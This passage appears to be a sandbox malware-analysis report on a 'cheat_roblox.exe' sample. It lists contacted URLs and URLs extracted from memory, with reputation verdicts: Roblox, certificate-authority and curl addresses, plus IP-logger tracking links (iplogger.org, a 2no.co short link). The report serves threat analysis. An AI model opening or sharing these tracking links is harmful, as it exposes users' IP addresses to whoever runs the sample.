                                  198.187.3.20.in-addr.arpa
                                  		unknown
                                  		unknownfalse
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    https://counter.yadro.ru/hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.0641046345653069false
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://cdn.iplogger.org/redirect/handshake.pngfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://2no.co/24RXx6false
                                      		unknown
                                      https://counter.yadro.ru/hit?t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.0641046345653069false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://cdn.iplogger.org/favicon.icofalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://a.nel.cloudflare.com/report/v4?s=%2BJTmNHgwHioPN1VPmZTocnt4x9yCwTmjK4IGhHrpCVWNf%2BX0QfcS27EEgMEfDt3n5oBkVrfy2gmymxlRNncb3eE%2BNabns2V2oWdUqt%2B6pchIIk0y0eYxI%2Bvmxvy3PDh%2B%2FlTefalse
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerPRobloxPlayerInstaller.exe, 00000004.00000003.1506844085.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510054438.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509329168.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517573174.0000000004827000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://crl.securetrust.com/SGCA.crlRobloxPlayerInstaller.exe, 00000004.00000002.1516741356.000000000260A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509001220.0000000002606000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508310105.0000000002602000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506475216.00000000025FF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508695693.0000000002605000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.winimage.com/zLibDll1.2.11rbrcheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerXRobloxPlayerInstaller.exe, 00000004.00000003.1506844085.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510054438.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509329168.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517573174.0000000004827000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.firmaprofesional.com/cps0RobloxPlayerInstaller.exe, 00000004.00000002.1517423133.00000000047EF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508725092.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507185996.00000000047E0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.00000000047BE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510424442.00000000047EF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507823321.00000000047EE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508219364.0000000004796000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://iplogger.org/chromecache_71.10.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerRobloxPlayerInstaller_9F112.log.4.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperRobloxPlayerInstaller_9F112.log.4.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://crl.securetrust.com/SGCA.crl0RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507432352.000000000260D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506475216.00000000025FF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506685606.000000000260C000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://client-telemetry.roblox.comHttpPointsReporterUrlBootstrapperWebView2InstallationTelemetryHuncheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://crl.securetrust.com/STCA.crl0RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507432352.000000000260D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506475216.00000000025FF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506685606.000000000260C000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://curl.se/docs/hsts.htmlcheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://tools.medialab.sciences-po.fr/iwanthue/index.phpcheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://client-telemetry.roblox.comRobloxPlayerInstaller.exe, 00000004.00000002.1516235530.000000000256B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller_9F112.log.4.dr, RobloxPlayerInstaller.exe.0.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayer0RobloxPlayerInstaller.exe, 00000004.00000002.1516990822.000000000479D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508776431.000000000479D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508219364.0000000004796000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://counter.yadro.ru/hit?chromecache_71.10.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.quovadisglobal.com/cps0RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506523382.00000000025E2000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516688620.00000000025FD000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507700641.00000000025FA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507934077.00000000025FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crlRobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507432352.000000000260D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506475216.00000000025FF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506685606.000000000260C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508164365.000000000260F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://setup.rbxcdn.comRobloxPlayerInstaller.exe.0.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://iplogger.org/preview/7c00c9b3d049350da3aca75cf5f83229chromecache_71.10.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://crl.dhimyotis.com/certignarootca.crlRobloxPlayerInstaller.exe, 00000004.00000003.1509281680.00000000047B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517063706.00000000047B3000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509159312.00000000047AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508502616.00000000047A8000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508083550.00000000047C3000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.00000000047BE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508219364.0000000004796000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://ocsp.accv.esRobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506659428.0000000002623000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506808610.0000000002628000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506475216.00000000025FF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506725819.0000000002625000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516791173.000000000262D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507963440.000000000262D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://repository.swisssign.com/RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507432352.000000000260D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516389477.00000000025AE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506475216.00000000025FF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510001432.00000000025AE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508922887.00000000025A0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506685606.000000000260C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509200841.00000000025AA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508164365.000000000260F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://iplogger.org/privacy/chromecache_71.10.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.roblox.com/RobloxPlayerInstaller.exe, 00000004.00000003.1509730298.000000000255A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510324009.000000000256B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509773967.0000000002568000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516235530.000000000256B000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://client-telemetry.roblox.comataRobloxPlayerInstaller.exe, 00000004.00000003.1509730298.000000000255A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510324009.000000000256B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509773967.0000000002568000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516235530.000000000256B000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://crl.xrampsecurity.com/XGCA.crlRobloxPlayerInstaller.exe, 00000004.00000003.1509730298.000000000255A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510324009.000000000256B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509773967.0000000002568000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516235530.000000000256B000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerLMEMHRobloxPlayerInstaller.exe, 00000004.00000003.1506844085.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510054438.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509329168.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517573174.0000000004827000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperwnloadsRobloxPlayerInstaller.exe, 00000004.00000002.1517491839.00000000047FB000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.00000000047BE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506844085.00000000047F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://ecsv2.roblox.com/client/pbeTelemetryV2UrlRobloxTelemetrySendByBatchSizeRobloxTelemetryBatchScheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.roblox.comRobloxPlayerInstaller.exe, 00000004.00000003.1509730298.000000000255A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510324009.000000000256B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509773967.0000000002568000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516235530.000000000256B000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://curl.se/docs/http-cookies.htmlcheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.accv.es/legislacion_c.htm0URobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://client-telemetry.roblox.cominatoreyRobloxPlayerInstaller.exe, 00000004.00000003.1509730298.000000000255A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510324009.000000000256B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509773967.0000000002568000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516235530.000000000256B000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://cdn.iplogger.org/redirect/logo-dark.pngchromecache_71.10.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://wwww.certigna.fr/autorites/0mRobloxPlayerInstaller.exe, 00000004.00000003.1508083550.00000000047C3000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.00000000047BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://ocsp.accv.es0RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://client-telemetry.roblox.comogsRobloxPlayerInstaller.exe, 00000004.00000003.1506844085.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510054438.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509329168.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517573174.0000000004827000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://client-telemetry.roblox.comeRobloxPlayerInstaller.exe, 00000004.00000003.1506844085.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510054438.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509329168.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517573174.0000000004827000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://wwww.certigna.fr/autorites/RobloxPlayerInstaller.exe, 00000004.00000003.1509281680.00000000047B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517091060.00000000047B6000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509159312.00000000047AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509602105.00000000047B5000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508502616.00000000047A8000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508219364.0000000004796000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://curl.se/docs/alt-svc.htmlcheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://cdn.iplogger.org/redirect/brand.pngchromecache_71.10.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://ecsv2.roblox.com/client/pbeesRobloxPlayerInstaller.exe, 00000004.00000003.1509730298.000000000255A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516172847.000000000255F000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509897327.000000000255D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://hg.mozilla.org/releases/mozilla-release/raw-file/default/security/nss/lib/ckfw/builtins/certcheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB31E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1512774662.0000000001F43000.00000002.00000001.01000000.00000009.sdmp, cacert.pem.4.dr, RobloxPlayerInstaller.exe.0.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.quovadisglobal.com/cpsRobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508619596.00000000025FB000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506523382.00000000025E2000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507700641.00000000025FA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516653504.00000000025FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayer(RobloxPlayerInstaller.exe, 00000004.00000003.1506844085.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510054438.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509329168.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517573174.0000000004827000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper.RobloxPlayerInstaller_9F112.log.4.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperadsRobloxPlayerInstaller.exe, 00000004.00000003.1506844085.00000000047F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://crl.securetrust.com/STCA.crlRobloxPlayerInstaller.exe, 00000004.00000002.1516741356.000000000260A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509001220.0000000002606000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508310105.0000000002602000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506475216.00000000025FF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508695693.0000000002605000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506659428.0000000002623000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506808610.0000000002628000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506475216.00000000025FF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506725819.0000000002625000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516791173.000000000262D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507963440.000000000262D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.accv.es/legislacion_c.htmRobloxPlayerInstaller.exe, 00000004.00000002.1516960770.0000000004790000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://crl.xrampsecurity.com/XGCA.crl0RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506523382.00000000025E2000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507700641.00000000025FA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507934077.00000000025FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
